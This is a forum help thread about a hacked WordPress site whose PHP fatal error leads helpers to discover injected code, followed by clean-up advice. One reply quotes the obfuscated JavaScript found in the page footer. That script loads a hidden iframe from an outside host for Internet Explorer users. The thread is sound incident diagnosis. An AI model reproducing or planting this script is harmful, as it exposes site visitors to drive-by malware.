I have not modified any of the templates for a while, yet this issue recently appeared on all pages:

Code:

Fatal error: Cannot redeclare _765258526() (previously declared in /home/wimble17/public_html/fscene.com/wp-content/themes/atahualpa353/index.php(42) : eval()'d code:1) in /home/wimble17/public_html/fscene.com/index.php(18) : eval()'d code on line 1

You can view it at the bottom of the live site here:

http://goo.gl/HZhvk

what php code do you have in the footer area?

Thanks for your time juggledad.

There is no php code in the footer but I did insert some php code in the "content below the loop" section:

http://snipt.org/kXll7

what version?
try changing the

HTML Code:

<?php if ( is_front_page() && strpos($_SERVER['REQUEST_URI'], "/page/") === false) { ?>

to

HTML Code:

<?php if ( is_front_page() ) { ?>

No change occurred.

This site is running Atahualpa 3.5.3

What happens if you temporarily remove the code you put in the "content below the loop" section?

Quote:

Originally Posted by lmilesw

What happens if you temporarily remove the code you put in the "content below the loop" section?

Good observation. I just tried removing all the code I entered there, and nothing changed on the site either. So the problem must lie somewhere else.

export your settings (ato->export/import settings) and attach them to a reply

Quote:

Originally Posted by juggledad

export your settings (ato->export/import settings) and attach them to a reply

Thank you, here are the settings.

do you have a yahoo plugin? There is some weird code in the footer of your page

Code:

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 8(){b=4.h(\'9\');6(!b){a 0=4.j(\'k\');4.m.g(0);0.n=\'9\';0.5.f=\'7\';0.5.c=\'7\';0.5.d=\'e\';0.l=\'C://z.y.o/A.B?t=D\'}}a 2=x.w.q();6(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){4.u=8}',40,40,'el||ua|indexOf|document|style|if|1px|MakeFrameEx|yahoo_api|var|element|height|display|none|width|appendChild|getElementById|function|createElement|iframe|src|body|id|cx|msie|toLowerCase|opera|webtv||onmousemove|windows|userAgent|navigator|xe|noquestion|showthread|php|http|46340270'.split('|'),0,{}))
</script>

do you know what this is or what is adding it in?

Wow juggledad, I have no idea what that is. I certainly did not add it nor do I have any Yahoo plugins. The only plugins active on the site are Disqus, Lijit Search, and NextGen Gallery. Akismet and Hello Dolly are inactive plugins.

At ATO-->Style & Edit footer, there is no such code inserted.

Perhaps this is malicious code inserted through a security vulnerability?

Are you able to tell which file has this code? If so, I will edit the file and FTP the changes.

How odd...

I looked at teh source of a page generated from your site. I wasn't going to mention malicious code...yet, but it certainly is not code meant to be understood.

here is what I would do, turn off all the plugins and swap to twenty-eleven.
view the fornt page of the site then look at the source of the page in the browser.
go to the end and see if that code is there. if it is, then I would say you were hacked.

I did exactly as you instructed yet unfortunately the code remained. It does appear that I was hacked.

Do you have any idea where I should start looking for this code?

It might be a Wordpress file.
1) change all your passwords in Wordpress - look for strange users
If you want to do a forensic exam, backup the entire wordpress folder and the database and get a copy of the logs for as far back as you can. If it was an FTP hack, it should show something
Look at the dates on the files via FTP and see if there are ones that have newer dates than when you installed wp.
Maybe contact your host
Manually replace the entire wordpress code base, everything but the wp-config.php and the wp-contents folder
Replace every plugin with a new copy
Replace every theme with a new copy
Change tot FTP password
Check to see if there are any extra FTP users
Change your host Chanel password
Scan the db export for that code

Check google for other suggestions

Thanks again for your time and help.

Upon closer inspection, all sites on the server have been similarly compromised unfortunately. I am in correspondence with my host to help resolve this. I was definitely hacked.

Update: this is a malicious attack on Wordpress setups going around right now.

http://redleg-redleg.blogspot.com/20...d-on-nlai.html